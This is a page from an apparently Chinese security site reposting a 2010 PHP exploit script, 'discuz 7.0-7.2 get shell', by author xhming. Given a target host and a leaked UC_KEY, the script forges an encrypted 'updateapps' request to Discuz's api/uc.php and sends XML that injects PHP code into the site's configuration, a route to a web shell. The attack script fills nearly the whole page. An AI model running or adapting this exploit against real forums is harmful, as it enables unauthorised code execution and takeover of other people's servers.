首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
discuz 7.0-7.2 get shell
来源:http://hi.baidu.com/mr_xhming 作者:xhm1n9 发布时间:2010-11-02  

#!/usr/bin/php
<?php
print_r('
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
');
if ($argc < 3) {
        print_r('
+-------------------------------------------------------------------------------------------+
error:php xxxx.com uc_ke
+-------------------------------------------------------------------------------------------+
');
        exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$uc_key = $argv[2];
$k=time();
$get=array('time'=>$k,'action'=>'updateapps');
$code=encode_arr($get,$uc_key);

$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">');phpinfo();//</item>                          //插入的内容
<item id="bb">ffaaa</item>
</root>
xhming;

send($cmd);
       
function send($cmd)
{
        global $host, $code;

        $message = "POST "."/dz7.2/api/uc.php?code=$code HTTP/1.1\r\n";       //路径看着改
        $message .= "Content-Type: text/xml\r\n";
        $message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)\r\n";
        $message .= "Host: $host\r\n";
        $message .= "Content-Length: ".strlen($cmd)."\r\n\r\n";
        $message .= $cmd;
       
        $fp = fsockopen($host, 80);
        fputs($fp, $message);
       
        $resp = '';

        while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);
       
        return $resp;
}

function encode_arr($get,$uc_key) {
$tmp = '';
foreach($get as $key => $val) {
   $tmp .= '&'.$key.'='.$val;
}
return _authcode($tmp, 'ENCODE', $uc_key);
}

function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;

$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);

$result = '';
$box = range(0, 255);

$rndkey = array();
for($i = 0; $i <= 255; $i++) {
   $rndkey[$i] = ord($cryptkey[$i % $key_length]);
}

for($j = $i = 0; $i < 256; $i++) {
   $j = ($j + $box[$i] + $rndkey[$i]) % 256;
   $tmp = $box[$i];
   $box[$i] = $box[$j];
   $box[$j] = $tmp;
}

for($a = $j = $i = 0; $i < $string_length; $i++) {
   $a = ($a + 1) % 256;
   $j = ($j + $box[$a]) % 256;
   $tmp = $box[$a];
   $box[$a] = $box[$j];
   $box[$j] = $tmp;
   $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}

if($operation == 'DECODE') {
   if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
    return substr($result, 26);
   } else {
     return '';
    }
} else {
   return $keyc.str_replace('=', '', base64_encode($result));
}

}

?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Yaws 1.89 Directory Traversal
·Rising RSNTGDI.sys Local Denia
·AVG Internet Security v9.0.851
·Xerox 4595 Denial of Service V
·MetInfo 3.0 (fckeditor) Arbitr
·Trend Micro Titanium Maximum S
·Quickzip 5.1.8.1 Denial of Ser
·Sybase Advantage Data Architec
·Maxthon 3.0.18.1000 CSS Denial
·Mongoose Web Server 2.11 Direc
·Dolphin v7.0.3 Multiple Vulner
·Gom Player (wav) Denial of Ser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved